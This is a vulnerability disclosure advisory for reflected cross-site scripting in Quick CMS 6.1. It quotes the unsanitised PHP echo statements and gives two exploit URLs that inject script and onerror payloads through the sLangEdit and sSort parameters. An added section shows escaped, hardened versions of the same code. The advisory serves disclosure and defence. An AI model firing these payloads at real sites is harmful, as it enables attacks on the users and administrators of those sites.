Quick CMS version 6.1 suffers from a cross-site scripting vulnerability.
## FULL DISCLOSURE
#Product : Quick CMS
#Exploit Author : Rahul Pratap Singh
#Version : 6.1
#Home page Link : http://opensolution.org/home.html
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 19/Jan/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
The "sLangEdit" and "sSort" parameters are echoed into the page without
sanitization, which leads to reflected XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: languages.php
Found at line: 23
<h1><?php echo $lang['Languages'].( isset( $_GET['sLangEdit'] ) ? ' '.$_GET['sLangEdit'] : null ); ?></h1>
File Name: pages.php
Found at line: 49
<form action="?p=pages<?php if( isset( $_GET['sSort'] ) ) echo '&sSort='.$_GET['sSort']; ?>" name="form" method="post" class="main-form">
----------------------------------------
Exploit:
----------------------------------------
localhost/Quick.Cms_v6.1-en/admin.php?p=languages&sLangEdit=</h1><script>alert("XSS")</script><h1>
localhost/Quick.Cms_v6.1-en/admin.php?p=pages&sSort="><img%20src=x%20onerror=confirm(1)><!--
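Added example (not part of the original advisory and not Quick CMS code): hardened equivalents of the two echo statements above, with encoding chosen per output context (HTML text for the heading, URL component plus HTML attribute for the form action). The function names are hypothetical, and $lang / $_GET are replaced by parameters and a constructed array so the script runs stand-alone from the PHP CLI (PHP 7.1 or later assumed).

```php
<?php
// Added example: hardened equivalents of the two echo statements quoted above.
// Function names are hypothetical; $lang and $_GET are replaced by parameters
// and a constructed array so the script runs stand-alone from the CLI.

/** Encode a value for an HTML text node or a quoted attribute value. */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** languages.php line 23: heading with the optional sLangEdit suffix. */
function render_languages_heading(string $label, ?string $langEdit): string
{
    $suffix = $langEdit !== null ? ' ' . html_escape($langEdit) : '';
    return '<h1>' . html_escape($label) . $suffix . '</h1>';
}

/** pages.php line 49: form tag whose action carries sSort back to the server. */
function render_pages_form_open(?string $sort): string
{
    $action = '?p=pages';
    if ($sort !== null) {
        // URL-encode the value as a query component first ...
        $action .= '&sSort=' . rawurlencode($sort);
    }
    // ... then HTML-encode the whole attribute value (also turns & into &amp;).
    return '<form action="' . html_escape($action)
        . '" name="form" method="post" class="main-form">';
}

/** Request values can be arrays (?sSort[]=x); accept plain strings only. */
function get_string(array $query, string $key): ?string
{
    return isset($query[$key]) && is_string($query[$key]) ? $query[$key] : null;
}

// Constructed input: the two parameter values from the Exploit section, URL-decoded.
$query = [
    'sLangEdit' => '</h1><script>alert("XSS")</script><h1>',
    'sSort'     => '"><img src=x onerror=confirm(1)><!--',
];

echo render_languages_heading('Languages', get_string($query, 'sLangEdit')), PHP_EOL;
echo render_pages_form_open(get_string($query, 'sSort')), PHP_EOL;
```

With both values encoded, the angle brackets and quotes arrive in the browser as text and attribute data, so neither the closing </h1> nor the "> sequence can break out of its context.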
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc.png
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc2.png
Disclosure Timeline:
Tried to contact vendor via email : 14/1/2016 (email bounced back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)
Public Disclosure: 19/1/2016
Pub ref:
https://0x62626262.wordpress.com/2016/01/19/quick-cms-v-6-1-xss-vulnerability